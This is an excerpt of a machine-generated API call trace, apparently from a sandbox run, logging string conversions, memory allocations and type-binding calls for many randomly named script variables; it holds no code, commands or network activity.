0x87fcbd8 [0060.838] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x9, _Src=0x557011e | out: _Dst=0x87fcbd8) returned 0x0 [0060.839] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0ada, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_DVxmXA7D") returned 16 [0060.839] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_DVxmXA7D", lHashVal=0x10142c, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.839] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557011e | out: _Dst=0x343ddc) returned 0x0 [0060.839] CRetailMalloc_Free () returned 0x7730201 [0060.839] ITypeComp:RemoteBind (in: This=0x87ce890, szName="d74WULQMP", lHashVal=0x10b13d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x542 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x542) returned 0x0 [0060.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570146, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="d74WULQMP") returned 10 [0060.839] ITypeComp:RemoteBind (in: This=0x87ce668, szName="d74WULQMP", lHashVal=0x10b13d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x542 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x542) returned 0x0 [0060.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570146, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="d74WULQMP") returned 10 [0060.839] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="d74WULQMP", lHashVal=0x10b13d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x542 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x542) returned 0x0 [0060.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570146, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="d74WULQMP") returned 10 [0060.840] ITypeComp:RemoteBind (in: This=0x87cef08, szName="d74WULQMP", lHashVal=0x10b13d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x542 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x542) returned 0x0 [0060.840] CRetailMalloc_Alloc () returned 0x61e2008 [0060.840] _mbscpy_s (in: _Dst=0x61e2008, _DstSizeInBytes=0xa, _Src=0x5570146 | out: _Dst=0x61e2008) returned 0x0 [0060.841] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0b06, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_d74WULQMP") returned 17 [0060.841] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_d74WULQMP", lHashVal=0x10ab01, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.841] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5570146 | out: _Dst=0x343ddc) returned 0x0 [0060.841] CRetailMalloc_Free () returned 0xffff0001 [0060.841] ITypeComp:RemoteBind (in: This=0x87ce890, szName="B52yb", lHashVal=0x1016a2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x544 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x544) returned 0x0 [0060.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557016e, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="B52yb") returned 6 [0060.841] ITypeComp:RemoteBind (in: This=0x87ce668, szName="B52yb", lHashVal=0x1016a2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x544 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x544) returned 0x0 [0060.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557016e, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="B52yb") returned 6 [0060.842] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="B52yb", lHashVal=0x1016a2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x544 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x544) returned 0x0 [0060.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557016e, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="B52yb") returned 6 [0060.842] ITypeComp:RemoteBind (in: This=0x87cef08, szName="B52yb", lHashVal=0x1016a2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x544 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x544) returned 0x0 [0060.842] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.842] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x6, _Src=0x557016e | out: _Dst=0x87fcbd8) returned 0x0 [0060.843] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0b36, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_B52yb") returned 13 [0060.843] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_B52yb", lHashVal=0x10dace, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.843] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x557016e | out: _Dst=0x343ddc) returned 0x0 [0060.843] CRetailMalloc_Free () returned 0x7730201 [0060.843] ITypeComp:RemoteBind (in: This=0x87ce890, szName="YhYPNpO", lHashVal=0x105126, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x546 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x546) returned 0x0 [0060.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570192, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="YhYPNpO") returned 8 [0060.844] ITypeComp:RemoteBind (in: This=0x87ce668, szName="YhYPNpO", lHashVal=0x105126, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x546 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x546) returned 0x0 [0060.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570192, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="YhYPNpO") returned 8 [0060.844] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="YhYPNpO", lHashVal=0x105126, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x546 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x546) returned 0x0 [0060.844] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x5570192 | out: _Dst=0x87fcbd8) returned 0x0 [0060.845] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5570192 | out: _Dst=0x343ddc) returned 0x0 [0060.845] CRetailMalloc_Free () returned 0x7730201 [0060.845] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x55701b6 | out: _Dst=0x87fcbd8) returned 0x0 [0060.845] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x55701b6 | out: _Dst=0x343ddc) returned 0x0 [0060.845] CRetailMalloc_Free () returned 0x7730201 [0060.845] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x55701da | out: _Dst=0x87fcbd8) returned 0x0 [0060.846] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55701da | out: _Dst=0x343ddc) returned 0x0 [0060.846] CRetailMalloc_Free () returned 0x7730201 [0060.846] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x9, _Src=0x55701fe | out: _Dst=0x87fcbd8) returned 0x0 [0060.846] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x55701fe | out: _Dst=0x343ddc) returned 0x0 [0060.846] CRetailMalloc_Free () returned 0x7730201 [0060.846] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x6, _Src=0x5570226 | out: _Dst=0x87fcbd8) returned 0x0 [0060.847] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570226 | out: _Dst=0x343ddc) returned 0x0 [0060.847] CRetailMalloc_Free () returned 0x7730201 [0060.847] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x557024a | out: _Dst=0x87fcbd8) returned 0x0 [0060.847] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557024a | out: _Dst=0x343ddc) returned 0x0 [0060.847] CRetailMalloc_Free () returned 0x7730201 [0060.847] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x557026e | out: _Dst=0x87fcbd8) returned 0x0 [0060.848] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x557026e | out: _Dst=0x343ddc) returned 0x0 [0060.848] CRetailMalloc_Free () returned 0x7730201 [0060.848] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x6, _Src=0x5570292 | out: _Dst=0x87fcbd8) returned 0x0 [0060.848] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570292 | out: _Dst=0x343ddc) returned 0x0 [0060.848] CRetailMalloc_Free () returned 0x7730201 [0060.848] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x6, _Src=0x55702b6 | out: _Dst=0x87fcbd8) returned 0x0 [0060.849] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55702b6 | out: _Dst=0x343ddc) returned 0x0 [0060.849] CRetailMalloc_Free () returned 0x7730201 [0060.849] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x55702da | out: _Dst=0x87fcbd8) returned 0x0 [0060.849] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55702da | out: _Dst=0x343ddc) returned 0x0 [0060.849] CRetailMalloc_Free () returned 0x7730201 [0060.849] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x55702fe | out: _Dst=0x87fcbd8) returned 0x0 [0060.850] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55702fe | out: _Dst=0x343ddc) returned 0x0 [0060.850] CRetailMalloc_Free () returned 0x7730201 [0060.850] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x5570322 | out: _Dst=0x87fcbd8) returned 0x0 [0060.850] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5570322 | out: _Dst=0x343ddc) returned 0x0 [0060.850] CRetailMalloc_Free () returned 0x7730201 [0060.850] CRetailMalloc_Realloc () returned 0x61c8938 [0060.851] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x6, _Src=0x5570346 | out: _Dst=0x87fcbd8) returned 0x0 [0060.851] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570346 | out: _Dst=0x343ddc) returned 0x0 [0060.851] CRetailMalloc_Free () returned 0x7730201 [0060.851] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x557036a | out: _Dst=0x87fcbd8) returned 0x0 [0060.851] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x557036a | out: _Dst=0x343ddc) returned 0x0 [0060.851] CRetailMalloc_Free () returned 0x7730201 [0060.851] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x9, _Src=0x557038e | out: _Dst=0x87fcbd8) returned 0x0 [0060.852] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557038e | out: _Dst=0x343ddc) returned 0x0 [0060.852] CRetailMalloc_Free () returned 0x7730201 [0060.852] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x55703b6 | out: _Dst=0x87fcbd8) returned 0x0 [0060.852] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55703b6 | out: _Dst=0x343ddc) returned 0x0 [0060.852] CRetailMalloc_Free () returned 0x7730201 [0060.852] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x55703da | out: _Dst=0x87fcbd8) returned 0x0 [0060.853] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55703da | out: _Dst=0x343ddc) returned 0x0 [0060.853] CRetailMalloc_Free () returned 0x7730201 [0060.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55703fe, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="CY7D0M") returned 7 [0060.853] ITypeComp:RemoteBind (in: This=0x87ce890, szName="CY7D0M", lHashVal=0x103ee5, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x568 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x568) returned 0x0 [0060.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55703fe, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="CY7D0M") returned 7 [0060.853] ITypeComp:RemoteBind (in: This=0x87ce668, szName="CY7D0M", lHashVal=0x103ee5, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x568 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x568) returned 0x0 [0060.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55703fe, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="CY7D0M") returned 7 [0060.853] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="CY7D0M", lHashVal=0x103ee5, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x568 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x568) returned 0x0 [0060.853] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x55703fe | out: _Dst=0x87fcbd8) returned 0x0 [0060.854] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55703fe | out: _Dst=0x343ddc) returned 0x0 [0060.854] CRetailMalloc_Free () returned 0x7730201 [0060.854] SysStringLen (param_1="\r") returned 0x1 [0060.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0060.854] SysStringLen (param_1="\r") returned 0x1 [0060.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=2, lpMultiByteStr=0x87fcb94, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 2 [0060.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x87ebc3a, cbMultiByte=1, lpWideCharStr=0xa0e1060, cchWideChar=4 | out: lpWideCharStr="\r") returned 1 [0060.855] CRetailMalloc_Realloc () returned 0x62679b8 [0060.858] CRetailMalloc_Realloc () returned 0x87fcbd8 [0060.858] CRetailMalloc_Realloc () returned 0x86bb670 [0060.858] CRetailMalloc_Realloc () returned 0x6185490 [0060.858] CRetailMalloc_Realloc () returned 0x8717830 [0060.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570496, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="bWNn3") returned 6 [0060.862] ITypeComp:RemoteBind (in: This=0x87cef08, szName="bWNn3", lHashVal=0x102663, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x570 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x570) returned 0x0 [0060.862] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.862] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570496 | out: _Dst=0x87fcc50) returned 0x0 [0060.863] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0e7a, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_bWNn3") returned 13 [0060.863] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_bWNn3", lHashVal=0x10ea8f, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.863] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570496 | out: _Dst=0x343ddc) returned 0x0 [0060.863] CRetailMalloc_Free () returned 0x7940201 [0060.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55704ba, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="vUnBV") returned 6 [0060.864] ITypeComp:RemoteBind (in: This=0x87cef08, szName="vUnBV", lHashVal=0x10c57b, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x572 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x572) returned 0x0 [0060.864] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.864] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55704ba | out: _Dst=0x87fcc50) returned 0x0 [0060.865] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0ea6, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_vUnBV") returned 13 [0060.865] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_vUnBV", lHashVal=0x108968, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.865] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55704ba | out: _Dst=0x343ddc) returned 0x0 [0060.865] CRetailMalloc_Free () returned 0x7940201 [0060.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55704de, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="juatm2Mo8") returned 10 [0060.865] ITypeComp:RemoteBind (in: This=0x87cef08, szName="juatm2Mo8", lHashVal=0x1003ca, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x574 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x574) returned 0x0 [0060.866] CRetailMalloc_Alloc () returned 0x87504e0 [0060.866] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x55704de | out: _Dst=0x87504e0) returned 0x0 [0060.866] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0ed2, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_juatm2Mo8") returned 17 [0060.866] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_juatm2Mo8", lHashVal=0x10fdcd, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.866] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x55704de | out: _Dst=0x343ddc) returned 0x0 [0060.867] CRetailMalloc_Free () returned 0x1a060101 [0060.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570506, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="j15gaN") returned 7 [0060.867] ITypeComp:RemoteBind (in: This=0x87cef08, szName="j15gaN", lHashVal=0x10e03c, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x576 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x576) returned 0x0 [0060.867] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.867] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5570506 | out: _Dst=0x87fcc50) returned 0x0 [0060.868] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0f02, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_j15gaN") returned 14 [0060.868] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_j15gaN", lHashVal=0x105aa6, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.868] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5570506 | out: _Dst=0x343ddc) returned 0x0 [0060.868] CRetailMalloc_Free () returned 0x7940201 [0060.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557052a, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="iL2WX40bI") returned 10 [0060.869] ITypeComp:RemoteBind (in: This=0x87cef08, szName="iL2WX40bI", lHashVal=0x10dfbb, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x578 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x578) returned 0x0 [0060.869] CRetailMalloc_Alloc () returned 0x87504e0 [0060.870] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x557052a | out: _Dst=0x87504e0) returned 0x0 [0060.870] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0f2e, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_iL2WX40bI") returned 17 [0060.870] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_iL2WX40bI", lHashVal=0x10e900, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.871] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x557052a | out: _Dst=0x343ddc) returned 0x0 